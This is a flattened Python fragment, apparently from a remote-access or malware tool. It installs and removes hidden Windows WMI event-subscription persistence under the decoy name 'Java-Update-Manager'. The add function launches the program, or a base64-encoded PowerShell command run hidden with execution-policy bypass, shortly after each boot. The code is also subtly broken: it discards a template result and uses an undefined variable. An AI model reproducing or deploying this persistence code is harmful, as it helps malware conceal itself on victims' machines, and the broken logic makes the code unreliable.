def _add_powershell_wmi(command=None, name='Java-Update-Manager'): try: if os.name == 'nt' and not methods['powershell_wmi'].established: cmd_line = "" value = sys.argv[0] if value and os.path.isfile(value): cmd_line = 'start /b /min {}'.format(value) elif command: cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(base64.b64encode(bytes(command).encode('UTF-16LE'))) if cmd_line: startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" globals()['__Template_wmi'].replace('[STARTUP]', startup).replace('[COMMAND_LINE]', cmd_line).replace('[NAME]', name) util.powershell(powershell) code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name result = util.powershell(code) if name in result: return (True, result) except Exception as e: util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e))) return (False, None)
def _remove_powershell_wmi(value=None, name='Java-Update-Manager'): try: if methods['powershell_wmi'].established: try: code = r""" Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace('[NAME]', name) result = util.powershell(code) if not result: return (False, None) except: pass return (methods['powershell_wmi'].established, methods['powershell_wmi'].result) except Exception as e: util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e))) return (methods['powershell_wmi'].established, methods['powershell_wmi'].result)